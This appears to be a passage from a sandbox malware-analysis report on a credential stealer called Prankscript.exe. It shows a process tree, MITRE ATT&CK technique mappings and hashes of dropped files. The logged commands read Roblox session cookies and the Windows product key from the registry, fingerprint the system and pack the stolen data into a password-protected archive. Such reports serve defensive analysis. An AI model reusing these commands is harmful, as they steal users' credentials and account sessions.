      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1452
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28642\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\HkYpO.zip" *"
    3⤵
    PID:2392
  - - C:\Users\Admin\AppData\Local\Temp\_MEI28642\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI28642\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\HkYpO.zip" *
      4⤵
      Executes dropped EXE
      PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1388
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2500
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1164

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004C0
1⤵
PID:1744

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3300

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2864

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3216

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
74e4a39ae145a98de20041613220dfed

SHA1
ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

SHA256
2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

SHA512
96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
228fefc98d7fb5b4e27c6abab1de7207

SHA1
ada493791316e154a906ec2c83c412adf3a7061a

SHA256
448d09169319374935a249b1fc76bcf2430b4e1436611f3c2f3331b6eafe55a2

SHA512
fa74f1cc5da8db978a7a5b8c9ebff3cd433660db7e91ce03c44a1d543dd667a51659ba79270d3d783d52b9e45d76d0f9467458df1482ded72ea79c873b2a5e56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
026e0c65239e15ba609a874aeac2dc33

SHA1
a75e1622bc647ab73ab3bb2809872c2730dcf2df

SHA256
593f20dfb73d2b81a17bfcc1f246848080dfc96898a1a62c5ddca62105ed1292

SHA512
9fb7644c87bdd3430700f42137154069badbf2b7a67e5ac6c364382bca8cba95136d460f49279b346703d4b4fd81087e884822a01a2a38901568a3c3e3387569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
d056cc8db57dff3a5ba348cf29958bb4

SHA1
ad05facc4c65acec30e30be014916e4a3d734215

SHA256
1df57f67ada73a4a6e9f0242563c11bfda9884354e913ed5813627c1592a3e6b

SHA512
a8f01ab09f856e164eb60b0cdcd69830aaa5b422ec21fc0f22c732375cf9c893587d13c87073cb29ef92109c1a5afbdc1620d8998e7bdf7e43e1d2161ccb1e4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
528B

MD5
dba37eab8e2ededaf3c338f8f9b78329

SHA1
a42101e8cc117c4495b52f429551c6d6d49363fc

SHA256
fc1ad8f00c98ccc51614b67ef21f7fc8333ad94abdb8173dfa71f65ca30a666d

SHA512
89d655ceef890334532fc17ef32f1940c1d53d7758d75638f8dee445e0bff47f24ee7467a22fb63a5a1c0d75f96bfd6195e189c4977956a2b5b664f2229739b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
2bf44c85dc191822dba725a5eb6b4b7a

SHA1
ec6520236cfe2926cf8063149e393921e5ec74b2

SHA256
d8329a61e59f7840689780b07c5dfd7bd79044aca5a2b8a62e1c675f6cdf126e

SHA512
343d733923969dde9e0cb9d4c29052746e3fcfd4cfeab3019ac152cb3f64e4411ee64a038f7cde2e561ab54adcad04c58adead2d118def99cb55a75494066400

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
d3b9bb99458b40b64c6d2f13b23d131e

SHA1
a76110c3643251ea92e4d4986f363f0a8389fb91

SHA256
6c4dbf1e1d8e97cf762c8b600d750639340cc4bece99aa38086176d93b0f6558

SHA512
c99343ab96c68f69131732d9a4899f312e7e4560273cf4e7f179cb6985240b6a587c2155628db029d46c7992acf2bb563a1ad9978582a2dfdca1a20f602e15af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
7f22be305e37ecc5d90a6cd94297d77f

SHA1
aa78afba7d608c166905d49ad162b004eb58c447

SHA256
dac4ebe7132d1b2369ba1b75a05fa1870fa59d1f4f62b3087a91740d14bf3043

SHA512
e0da52868ac3f9b70be3e4be0b22d3ab33cd47ca3a093ff062bf847322fec6228331302bc252abb5133bbf3bb582d1fdec08019255fb30487b909f31c20af625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
138cd06dfea3c39afa27d046a38d4cc3

SHA1
ce352246ddd0065f3a457b62fe4941f21627d5ab

SHA256
9890975f6330ba3cc124e3dd8ab7ce26a6e09061bf62f6bb203f45c2ea681b53

SHA512
8946ff87804fb1ba027e888f22db218f9f9b53e4614ec412666874b49b038db34b3caef68c752238def651bbf7f386d015b5ad1dd6d3f15235fde9d7462b71b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
237acd9d2425f459c6fa0501b3651855

SHA1
1c53acc8d140c81414d5bf6cfba7e78104e89221

SHA256
baa00ab483a8fb1eeb45577bc9251607562af24b72b790aace5024ef3d491e0f

SHA512
9c4343e7bfb92061dc68ca32c4c56114a9fa5fe3772d8ddfad844a71def1dd5dbe4aff49ff71c99059161494e6db455d4161ce52e880205e0fd6e522ee9039ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
5ea2479cadbb394c64a41390633c7c93

SHA1
4d612bf24d1c6eb11b043e5e1b0c79d01cb28459

SHA256
5d22010077509efbc9bc311fe7557ab708b2956d4746618cca5c6c9cf780b30e

SHA512
7ed4448212b240de32919e22df11c0341d7552ece5f8d0186302a0510edaa63be7d2597bf986050567cfcb2e4c2c1395bd43797414a0d35352bcc6f9a03b476a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
cbd04df3e988fc4d9b6e4b400168dde7

SHA1
4a0c63546d398fd55ea1bf9a014afca99c41dd26

SHA256
89609e2d9c67050d82451345f6f30cb36beecd9edf753220ed230f6283c8d493

SHA512
bb8313034a1eddc336f1b2dc7505d62f997211eab7d82445ef70d52f3f559a4b88216bd6943cb80b7235ce3de688c5355a3c1f25b0fbeb619e41f945f2a3c0f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
683befe5e160e8c16528cedeefe3b309

SHA1
2078f4d926d1e38c07de551de4cbd9f981b32baa

SHA256
f34e1051119c9edd603cf01bb26ed20d8a0c90f6fd70f45147bb1052476c837e

SHA512
d377f6a92af46eb84d257b61821a70b1fa102ec740fbe4000b41e26dae647d8c2f193aed8ddc975eff213edabe5bd856b7929ce832771ce79a65f795d94c8168

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c01c3f82d4feabc58b22b7e78b24dfef

SHA1
bc30aa3cfd4ab9baf2831f1c38f44ca7bf2b705d

SHA256
1f951ea95d44d745ba6508b0be004f089eb61f8ab47f345120ad8ae7d0c44396

SHA512
96d25ee54582571ffb562c6d6ace64670ec84866a429db19e03e6b0ccede39138b6dee1af47d24a112a051616b1eecb9efb4aba9ec301f2644d094c42a045abe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
fa96d14c667a09b40d84157f68006664

SHA1
2464afdf1d987700ebcd0e57de84fb798d622144

SHA256
06a89ef5a990585fe3874e5630094d412863ae190a250e33c07af27987768127

SHA512
13b9473202c563fb0a864d7626e30c52f93b86d2b11dc8852d2e505b39c22de1b539704bce6e4d74f23b511e94ea9b509c4b9d35108e5620a9b24898d9e4db43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
3016e65908d3d2b33711f01167d1034f

SHA1
afa553f2d98ce88052e9af76aa4a2d635c3d0b15

SHA256
7e39a13d07cdffea99afa986e9948ac5697c5cf070d9fd4ebb130da98eacd8ac

SHA512
7f1dd712346c4200ed0f8d16793fb9b3cc679b497e8b5c9b3879dfd6e269282c949cce2ee24bbee4d18d9cccefc2e2167da6093f3cdfab6fb831c9760420efd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
113cfee483f3517deed6d458325f4df6

SHA1
5f6f84e0e76c07966f9d3920e7c420ec00acb296

SHA256
9de7b5956bc5937df7f7a944980827263e0b8039bc5f6ccd5d1fe88581166f43

SHA512
84a2f6c7f8463b8d0bdfd55c7260b3c4abb68c505bfef297a4742aa2b5ce675b1547ca00367bd110b0c5adfacb77234ffb8c1986707a859ac3798636452f9655

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\36e564c3-f9c4-478f-8a22-6467fc4e7891\index-dir\the-real-index

Filesize
2KB

MD5
07fe3e44d65997ae248e01b781aef94b

SHA1
ba45782009e6f70650bbc83c9ee5eb7da6cbd31d

SHA256
e49b1de5bd0caa1df942ac0bdc63fa7d37a43c922012650539d136471ec9a267

SHA512
b72b51f5bd566f3f69fbea2c8166fdd0a9736ccf5d27b318573973af2b38c92e9cdaff48a47495850d3102bd81717d922b8dc51313973adc16dfa38c9a2858ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\36e564c3-f9c4-478f-8a22-6467fc4e7891\index-dir\the-real-index~RFe588c4d.TMP

Filesize
48B

MD5
771f35c69ee3ec22e8bb09f5e8a9476c

SHA1
5a58e64aba678fbe815aff530598e8a0ae0ae743

SHA256
1b82ac6e7bd00ab78f73de1358f947557e86b9cc7c0e99b3780449e986bf1f0c

SHA512
35a49af274799a962b7c2142701c23b5db2d6db5c39dd29bed16bcf115bc12196be3939b7b1e87eaab12cc70eafc02b6310d2f26581a207752f37797d2f3b5d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
146B

MD5
51d2a978130c7c87b23b63719016e15c

SHA1
3b77b9883cea02b90da9e7cbbc2f8afd17d2505e

SHA256
cf4c51a0f77a01c3d533abf0cc4c679e39494ef686f6400651858563542f39c9

SHA512
9f92afe8a36001bc2d10a0328ab27f3f2b0579b71c4c88702ca2b9fa6bb4b8ea01ce33db17ab3adb32121eaea2cc667094d107861bcb268e191497542e11591e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
82B

MD5
3a9b49019f83db02686d6719b0990b0c

SHA1
47ae5027ff5a4dd1504e8cfcad4fc36bcaab9914

SHA256
4d12cc4b65f42b1e450c720e9aaf5004e9a517441ebada12a658676bd680cbf0

SHA512
9d543a8fdfdc8976c7e8fab17e944361976030289f65e959f349e7315ec8ceb17bba40c7718cdee573220db892f0ea0e04314b1afa27c93bb0dc51cfb50efa9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
89B

MD5
128118610b7746aa91344283a78c3697

SHA1
bde21b76783090cda4c688dbaa58f2909f563dd5

SHA256
42042ce847477e6534cc7e9e4095efde889cd8e7776b4e54525c8e8846c8d09c

SHA512
a319c42c1cb1a4ef26717ea6c88eee7b1b5555f4da72c45e41c23cf5467993bae9d28b401200819cc84bab747d35f732ac2e2e416cfa2dd153dcecd08911c5e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
84B

MD5
d07f5e70c3544b165bd26891851e4ec2

SHA1
0a77a7572bc34440383a36db2dcb18758415c191

SHA256
8ecc1340588f516c9b114ead68c743384ebe93dbf9916a87d60d24dfecc6318f

SHA512
991a0c67f68058b7a822452458b62fd28c31c7af49051f30d69cae8f714f5b6173538bc094b912cdd1296e12ae2403e5dc9b9a8b39f1c2e62a4e2370ea946af5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
127c20b14a49edcb0bba42de1431a82c

SHA1
a77e62ec6d9d5bb770ba7f70bac7d070800ceb32

SHA256
6a84389ff0a76c83e4e918cce52e502bf53e7feec39757f0a9e0ebf28aaf22f6

SHA512
3d7b853d42d956ccfcaeabfb99a3faadc1cd0eb30e493ca6ca04b29446a4565fe125de5ce74c193daa18bca2e5d52d7c42831fb1884c991902a47cbed3fbe018

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5837d4.TMP

Filesize
48B

MD5
960ab927f57b44be263125fc54d4583b

SHA1
c154433cf5818b64eec11b274514eb6853de82d1

SHA256
3cdd7327b2d811494dcdefcec94f698207dd38757773f2104314a29339c5d7c9

SHA512
31ce1079a8add65d866516188f0bd3afda8b58a72ce92058acbb82c6b0b961c0031a617a8e670e2c51b333539b00bc5f1132154a93b4f98d49f057682d5ac128

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
706B

MD5
6d87b523f7cd1baddf9c616a7ee7ae67

SHA1
c33579dc2b7207ca56549ecd93fc0c79a1dfd317

SHA256
fe26db8e52ffbcf337a201d49ceb123862d73f1aa4c687895e5f384733a53b01

SHA512
1b1d33e5cf0b4abeb7b47b7cc393cf271c26ac9a756372a31c644c7728209d3731b5ce642ba590b9116551d41bf8581ab32590c31181329787542bcabf5bc281

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
31aa7841a4e281e650ec219afb4cea19

SHA1
1845f763c6284a0bdd8dd86fa4139cdd5e331ab0

SHA256
d96df2915e2e7737b8e198ed725ccc0ad60e23b5c3ba6234c0ac8798298e5c31

SHA512
b9c2ed12a4e737c086a895c53cb1c8634026d11130eb77947ea182e4ed38838b44583a9768685d09a6e14f9d845a86758c90deb6fc328c5376ada6c81c240a5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
c185bed5733afc3f19939cede0174c43

SHA1
0db98f07a2d4afa66b2ac9779d7efc208b179289

SHA256
99890bcb2df32188757523dea8a5bce5d80ad207796bf14ab9d515d9255ca5dd

SHA512
d70aa044aa50b2d65f481639f3e04b588d78bcaad167e939f0e1d356b9aec0f586463773c8687ecf4bda93c5688bdca216ecc7b4dbedc0129de138daf35e18a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
b0c7f083764d68d13bb14801c454e019

SHA1
b3fd1659b882edc606ba673ca25adabb6512a8a9

SHA256
6c5eab46e2cab2f4a84b255a59fd061fee218d2be035d668904eccc40c5017c4

SHA512
6169a0f08c34ef9dfc5c9179a656e54a33bb2d1e36d2402d2a4bf4e08e2270e32d5c273ee97eef57b8a68dd7689a8878200b5042b4b2573fd09fe84c03aea4e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
4d8e9579d402159c91aacd1616d9b053

SHA1
e0fa79bb61f67bbf2fc984592a1eb9cb5dac9634

SHA256
1613f7272fca706b4c69aba164ac635fff1b52917b5aeedc84ea25fca87417a2

SHA512
b3bf0689f18c524a778929634f81ad62e1530764ef87e5650130afa3cefa59f31fb3688b3fbc027a4be948a9c63601d74c71e7ca131be0973b259a8365a23178

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585b4a.TMP

Filesize
706B

MD5
762446a3bc9a9a90d7edf289dec6070d

SHA1
79357d5a4dab41d17d79ddf0d486173e69af608a

SHA256
b17848cc873ee41fb124a3c4a647b4fd2ae0945ca46cc83ef4069e7df007e183

SHA512
f09b1ea84e3acf04b9ab0d767621e43eaf7d83cbf0ab707b16610d8a37161c82bb5da99045b5d52b2b03df77504cb911180d3d1785489f9a36b9f4b9e6905709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
db3fc46fbdf27698f30ef95a79cb4cda

SHA1
4bf3592a9ca96605bce18d2e15dc1972913aea72

SHA256
b2226e818db7a1579168252e6a83a7e5dcf3b31769cb8ae714aa271969e69c32

SHA512
257544907dd563b05ead1912f6db5f92d6d7bf6a750db2ee8a078562af7c5558392f52b1243ae3ab3faa4a2ba39f569ce51662fbb45980ee85b3366275ca1370

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c77176e9d56686444f7e5f2b0c948413

SHA1
ff0e6b99f2bc826c550bb020f620b6628b3ee200

SHA256
154f4848ce6887a22081d5a8969f1663198a3e6bd686b363bbc21745dcbeee81

SHA512
28db682683bdaf899ecaf34420fc0f92a28c046af52ea6333f3e34d13cb899a243dee446da136de05ce94a96b43a926a7e733f6eb324b561577faa5b71ae0d2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6903d57eed54e89b68ebb957928d1b99

SHA1
fade011fbf2e4bc044d41e380cf70bd6a9f73212

SHA256
36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

SHA512
c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
aa4f31835d07347297d35862c9045f4a

SHA1
83e728008935d30f98e5480fba4fbccf10cefb05

SHA256
99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

SHA512
ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9fe4cd5675481c6c8c97e2f2e9c76c96

SHA1
b97159260e37b3fa7e89852d825d8cf0583258ee

SHA256
70403ccad41d73af48ab5773271d833c64dd42e97279c281e2ef76bdbd3c6f51

SHA512
8eeab245b6e6e43347d1db6afda002afded1d419dd440823efc44375ba24817d27323c21fe33c2bda4dbd414748cd4071759651c469b6b6691117fec9835e1ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
41ce6cd728e8893a0387cd1d5aaf201d

SHA1
c6c5257c73d52968b03fa7a332f61f050229999c

SHA256
c6ff6212cd4c01ff44605a8339568c3ed2b9dd85c7956873ee9db592e24b654d

SHA512
73c40effe3fa0c521cdd5347e85ac142666a5a7b982d96c80f4c08c079d2f5a8d58c12644af20f27b8480040eb74b28d0696be16fc9566c02bf2d60d08839c27

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
9bef7c41d0bb3a44a18c637e03b43e7e

SHA1
f093796be97df77af8a2595d56816f813d2f6558

SHA256
ffb02e89bbf055faff78823c2dfff35172c48a095d8f698bcdb447a86408ebf8

SHA512
7f543a259b79eb4ac25db95bd1059d746acfc192f3d5ddb44d3a63990a2cd31d6b404c0ec3b659457de58a5bad5254680764eaa6a7f6dc35076971f2542750fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\6810.tmp\6811.tmp\6812.vbs

Filesize
6KB

MD5
d6f26d50b44406c1bba065a9b1ec2ad7

SHA1
67f754b4139958b2314464bdb2e2faf1c8501c55

SHA256
02def6f01e490ba7366e39db6fbd79f657e347d248db2e0254bc508abc89de75

SHA512
aa0ea658e75531a8ae02befe37dfe172b6c3cb7b4b0bbe77b51cceeb39c2a19a360f23772acf5c89447365f6de1060de0ee7dbda049758d2eff4f84bc8ff02c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6D41.tmp

Filesize
1KB

MD5
450e5ded6e156d01cf7a6ae1a4684ca5

SHA1
2bbcbedf4e1ff4801404396b9eed70d214708d91

SHA256
dd2e6a806bd104fb47c321b24e1a549251dc1fcaa8a4bcf58e015c526ba5073b

SHA512
81d74b5d15626ee6649b1e5aecd9bbe3283270fb2f1e87ccdc22bc64868b607058ffd500e6c48da7e0eddffe66dd44ca79d35b785773e9c7b84c376c410b9aa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28642\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28642\_bz2.pyd

Filesize
48KB

MD5
ba8871f10f67817358fe84f44b986801

SHA1
